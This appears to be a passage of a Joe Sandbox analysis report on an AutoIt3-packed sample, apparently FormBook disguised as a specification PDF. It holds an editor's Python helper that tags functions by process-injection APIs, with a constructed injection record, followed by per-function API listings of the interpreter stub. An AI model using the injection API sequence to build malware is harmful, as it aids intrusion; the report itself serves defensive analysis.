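The records above are the Joe Sandbox IDA plugin's per-function API and string listings for the unpacked AutoIt3 stub. Several of them are recognisable interpreter internals rather than attacker code: the "alias PlayMe" / "play PlayMe wait" MCI commands belong to AutoIt's SoundPlay(), "type cdaudio alias cd wait" and "set cd door" to CDTray(), @GUI_DRAGFILE/@GUI_DRAGID/@GUI_DROPID are AutoIt GUI macros, and the GetUserObjectSecurity → GetAce/AddAce → SetUserObjectSecurity sequence is the window-station/desktop DACL adjustment the runtime performs for RunAs. The following helper, written by the editor for this report and not part of Joe Sandbox, AutoIt or the sample, parses listings in exactly this text format into call tuples per function and tags each function either as AutoIt runtime code (via those strings) or as carrying Nt/Win32 APIs commonly seen in the injection behaviour the report's signatures flag. Both fingerprint lists are the editor's choices; the third sample record, including its API names and addresses, is constructed to exercise the injection tag and does not come from the sample.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings (editor's example).

Parses the plain-text records shown in this report into (api, module, args,
ref, from_subcall) tuples per function and tags each function as AutoIt3
runtime code or as using injection-related APIs. The fingerprint lists are
the editor's choices, not a Joe Sandbox feature.
"""
import re
from dataclasses import dataclass, field

# One call line, e.g. "• CreateFileW.KERNEL32(00000000,80000000), ref: 003AE754"
# or "• GetDriveTypeW.KERNEL32 ref: 0038D2DF" (no argument list), optionally
# prefixed with "Part of subcall function XXXXXXXX:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"          # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"              # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"   # call-site address
)
STRING_ID_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")

# Strings that belong to the AutoIt3 runtime: the MCI alias used by
# SoundPlay(), the CDTray() MCI commands and the GUI drag/drop macros.
AUTOIT_STRINGS = ("PlayMe", "type cdaudio alias cd wait", "set cd door",
                  "@GUI_DRAGFILE", "@GUI_DRAGID", "@GUI_DROPID")

# Editor-chosen APIs worth a second look when the report flags injection.
INJECTION_APIS = {
    "VirtualAllocEx", "NtAllocateVirtualMemory", "WriteProcessMemory",
    "NtWriteVirtualMemory", "QueueUserAPC", "NtQueueApcThread",
    "SetThreadContext", "NtSetContextThread", "CreateRemoteThread",
    "NtMapViewOfSection", "NtUnmapViewOfSection",
}


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)    # (api, module, args, ref, from_subcall)
    strings: list = field(default_factory=list)  # entries of the "String ID" line

    @property
    def ref(self):
        """Address of the first direct call; used as the block's identifier."""
        direct = [c for c in self.calls if not c[4]]
        return (direct or self.calls or [("", "", (), "", False)])[0][3]

    def tags(self):
        tags = set()
        if {c[0] for c in self.calls} & INJECTION_APIS:
            tags.add("injection-api")
        joined = "$".join(self.strings)
        if any(s in joined for s in AUTOIT_STRINGS):
            tags.add("autoit-runtime")
        return tags


def parse_blocks(text):
    """Split the listing at each 'APIs' header; collect its calls and String IDs."""
    blocks, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionBlock()
            blocks.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            current.calls.append((m["api"], m["module"], args,
                                  m["ref"].upper(), m["sub"] is not None))
            continue
        m = STRING_ID_LINE.match(line)
        if m:
            current.strings = [s for s in m["ids"].split("$") if s]
    return blocks


def triage(text):
    """One (ref, api names in call order, sorted tags) row per function."""
    return [(b.ref, [c[0] for c in b.calls], sorted(b.tags()))
            for b in parse_blocks(text)]


# Sample input: two records copied from this report (SoundPlay and the DACL
# function) plus one record CONSTRUCTED by the editor in the same format.
SAMPLE = """\
APIs
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00387B42
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00387B58
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00387B69
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00387B7B
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00387B8C
Strings
Memory Dump Source
• Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Similarity
• API ID: SendString
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
APIs
  • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A8CB
• AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A969
• SetUserObjectSecurity.USER32(?,00000004,?), ref: 0037AA2F
Similarity
• String ID:
APIs
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,00003000,00000040), ref: 00401234
• NtWriteVirtualMemory.NTDLL(?,?,?,?,00000000), ref: 00401256
• NtQueueApcThread.NTDLL(?,?,?,00000000,00000000), ref: 00401278
Similarity
• String ID:
"""

if __name__ == "__main__":
    for ref, apis, tags in triage(SAMPLE):
        print(f"{ref}: {', '.join(apis)}  tags={tags or ['-']}")
```

Functions tagged autoit-runtime can be set aside during triage; the FormBook logic lives in the compiled AU3 script the stub executes and in the injected process, not in these interpreter routines. Untagged functions with no AutoIt strings, and anything tagged injection-api, are where an analyst's time goes first.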
                                      APIs
                                      • timeGetTime.WINMM ref: 00387794
                                        • Part of subcall function 0035DC38: timeGetTime.WINMM(?,76179610,003B58AB), ref: 0035DC3C
                                      • Sleep.KERNEL32(0000000A), ref: 003877C0
                                      • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003877E4
                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00387806
                                      • SetActiveWindow.USER32 ref: 00387825
                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00387833
                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00387852
                                      • Sleep.KERNEL32(000000FA), ref: 0038785D
                                      • IsWindow.USER32 ref: 00387869
                                      • EndDialog.USER32(00000000), ref: 0038787A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                      • String ID: BUTTON
                                      • API String ID: 1194449130-3405671355
                                      • Opcode ID: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                      • Instruction ID: a86f71a1f049ec1066632c40eefbde938bc9bcef14019cfd6d66270620552d9e
                                      • Opcode Fuzzy Hash: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                      • Instruction Fuzzy Hash: F7211870204305AFE7066F20AD89F263F6EFB4534AF1500B8F91696162CB71AD14DB29
                                      APIs
                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00385664
                                      • GetMenuItemCount.USER32(00401708), ref: 003856ED
                                      • DeleteMenu.USER32(00401708,00000005,00000000,000000F5,?,?), ref: 0038577D
                                      • DeleteMenu.USER32(00401708,00000004,00000000), ref: 00385785
                                      • DeleteMenu.USER32(00401708,00000006,00000000), ref: 0038578D
                                      • DeleteMenu.USER32(00401708,00000003,00000000), ref: 00385795
                                      • GetMenuItemCount.USER32(00401708), ref: 0038579D
                                      • SetMenuItemInfoW.USER32(00401708,00000004,00000000,00000030), ref: 003857D3
                                      • GetCursorPos.USER32(?), ref: 003857DD
                                      • SetForegroundWindow.USER32(00000000), ref: 003857E6
                                      • TrackPopupMenuEx.USER32(00401708,00000000,?,00000000,00000000,00000000), ref: 003857F9
                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00385805
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                      • String ID:
                                      • API String ID: 1441871840-0
                                      • Opcode ID: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                      • Instruction ID: 5d43ec4da994b42506c844ce202a057e3678ef3da98df65cc2214e961a418ae8
                                      • Opcode Fuzzy Hash: ae6158f5b0c50d53bc6756faa5ff3960c67d445c9a00d4736c6e9d669ffdd2c4
                                      • Instruction Fuzzy Hash: 5B710330640B05BFEB23AB54DC49FAABF69FF00368F644256F618AA1E0D7716C10DB90
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00382ED6
                                      • SetKeyboardState.USER32(?), ref: 00382F41
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00382F61
                                      • GetKeyState.USER32(000000A0), ref: 00382F78
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00382FA7
                                      • GetKeyState.USER32(000000A1), ref: 00382FB8
                                      • GetAsyncKeyState.USER32(00000011), ref: 00382FE4
                                      • GetKeyState.USER32(00000011), ref: 00382FF2
                                      • GetAsyncKeyState.USER32(00000012), ref: 0038301B
                                      • GetKeyState.USER32(00000012), ref: 00383029
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00383052
                                      • GetKeyState.USER32(0000005B), ref: 00383060
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                      • Instruction ID: 2d4c0220f3c3a9c572ca3773be57b7c72f2000cdc49e19bcd234cdbf4c5efcc6
                                      • Opcode Fuzzy Hash: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                      • Instruction Fuzzy Hash: 3A51C670A0478429FB37FBA488107ABBBF49F11740F0945DED5C25A6C2DA54AB8CC7A6
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 0037ED1E
                                      • GetWindowRect.USER32(00000000,?), ref: 0037ED30
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0037ED8E
                                      • GetDlgItem.USER32(?,00000002), ref: 0037ED99
                                      • GetWindowRect.USER32(00000000,?), ref: 0037EDAB
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0037EE01
                                      • GetDlgItem.USER32(?,000003E9), ref: 0037EE0F
                                      • GetWindowRect.USER32(00000000,?), ref: 0037EE20
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0037EE63
                                      • GetDlgItem.USER32(?,000003EA), ref: 0037EE71
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0037EE8E
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0037EE9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                      • Instruction ID: 9426fd1ef48f60f44216bf33655733ba9623656182c41716dd5fcbeda9460554
                                      • Opcode Fuzzy Hash: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                      • Instruction Fuzzy Hash: 5A512DB1B00205AFDB19CF68DD89EAEBBBAEB88300F558579F519D7290D774AD00CB10
                                      APIs
                                        • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0035B72B), ref: 0035B7F6
                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 0035B88D
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 003BD8A6
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8D7
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8EE
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD90A
                                      • DeleteObject.GDI32(00000000), ref: 003BD91C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                      • Instruction ID: ec38a6e1bfc075ea41da1571d9ed2c99e5e4488c14e25ae732340ee18030fb38
                                      • Opcode Fuzzy Hash: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                      • Instruction Fuzzy Hash: DC619A30501600DFDB279F18DD88F65B7B9FF84316F16092DE9869AA70C731B898CB44
                                      APIs
                                        • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                      • GetSysColor.USER32(0000000F), ref: 0035B438
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                      • Instruction ID: 8de47422931f62ebe96bab2a75d272ace3ad1773602fff74df708fca14600194
                                      • Opcode Fuzzy Hash: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                      • Instruction Fuzzy Hash: 1241CF70000100AFDB325F29DC89FB97B6AAB06732F198265FEA58E5F2D7309C45CB21
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0037CF91
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0037D09A
                                      • GetClassNameW.USER32(?,?,00000400), ref: 0037D10D
                                      • GetDlgCtrlID.USER32(?), ref: 0037D15F
                                      • GetWindowRect.USER32(?,?), ref: 0037D195
                                      • GetParent.USER32(?), ref: 0037D1B3
                                      • ScreenToClient.USER32(00000000), ref: 0037D1BA
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0037D234
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0037D26E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                      • String ID: %s%u
                                      • API String ID: 1412819556-679674701
                                      • Opcode ID: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                      • Instruction ID: 0b8f76c16437af52a52560acc03b6ca6f295bc201bbd435b8cae06382826cd4b
                                      • Opcode Fuzzy Hash: 7e25dd6062efbc9244375425cccd3d574b9187a2e2d61b8a0e42e50d78ea767b
                                      • Instruction Fuzzy Hash: 0CA1CF31204306AFD726DF64C884FAAB7E8FF44314F008929F99DD6191EB34EA56CB91
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0037D8EB
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0037D924
                                      • CharUpperBuffW.USER32(?,00000000), ref: 0037D941
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0037D9A8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0037D9DF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0037DA28
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0037DA60
                                      • GetWindowRect.USER32(00000004,?), ref: 0037DAC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 3725905772-1539354611
                                      • Opcode ID: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                      • Instruction ID: 6f339d26bf3c7a0734b8863c596734635a60832793add35a6e293d3723c2c10b
                                      • Opcode Fuzzy Hash: f36a2003cbe0df3b0afcd52426ed14c71b07378a7130eaf592e39a3fdf2cd2ff
                                      • Instruction Fuzzy Hash: 038191310083059BDB22DF14C985FAA7BE8FF85314F058469FD8A9A095DB38ED45CBA1
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?), ref: 003826F1
                                      • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 003826FA
                                      • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?,00000016), ref: 0038271C
                                      • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 0038271F
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00382840
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                      • API String ID: 4072794657-2268648507
                                      • Opcode ID: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                      • Instruction ID: 03e145cb53fb231d1b6e47cb7af041c1b680fbab1168300a674058b15c369d34
                                      • Opcode Fuzzy Hash: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                      • Instruction Fuzzy Hash: 1741EC72800219BACF16FBE0DD86DEEB7B8AF15340F500065B6057E092EA756F59CB61
                                      APIs
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0037A211
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0037A22D
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0037A249
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0037A273
                                      • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0037A29B
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2A6
                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0037A2AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 3030280669-22481851
                                      • Opcode ID: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                      • Instruction ID: d45a8476629a2115f15b49067827afa6332355aa2cd5ba1c1bb555689f0b1da9
                                      • Opcode Fuzzy Hash: ed32b95bf91179f4a6f67272b8086650fa3d1b71136e35f416067af86b12da7a
                                      • Instruction Fuzzy Hash: 8741F476C10629ABDF22EBA4DC85DEEB7B8FF04340F014429F905BB161EA74AE05CB51
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003AA259
                                      • CreateCompatibleDC.GDI32(00000000), ref: 003AA260
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003AA273
                                      • SelectObject.GDI32(00000000,00000000), ref: 003AA27B
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 003AA286
                                      • DeleteDC.GDI32(00000000), ref: 003AA28F
                                      • GetWindowLongW.USER32(?,000000EC), ref: 003AA299
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003AA2AD
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003AA2B9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 041409e54fae22aed0fa3af65702bca7ded3fa5cf98f146d0e261d1644556083
                                      • Instruction ID: afbf5821ba689a1e536718972d4b33848f4f852453791812b40b4415788d2396
                                      • Opcode Fuzzy Hash: 041409e54fae22aed0fa3af65702bca7ded3fa5cf98f146d0e261d1644556083
                                      • Instruction Fuzzy Hash: E7314F32100515ABDF225FA5DC49FEA3B6DFF0A760F110628FA19E61A0C736E821DB65
                                      APIs
                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038D0D8
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0038D137
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0038D15C
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0038D1EC
                                      • CloseHandle.KERNEL32(00000000), ref: 0038D1F7
                                      • RemoveDirectoryW.KERNEL32(?), ref: 0038D200
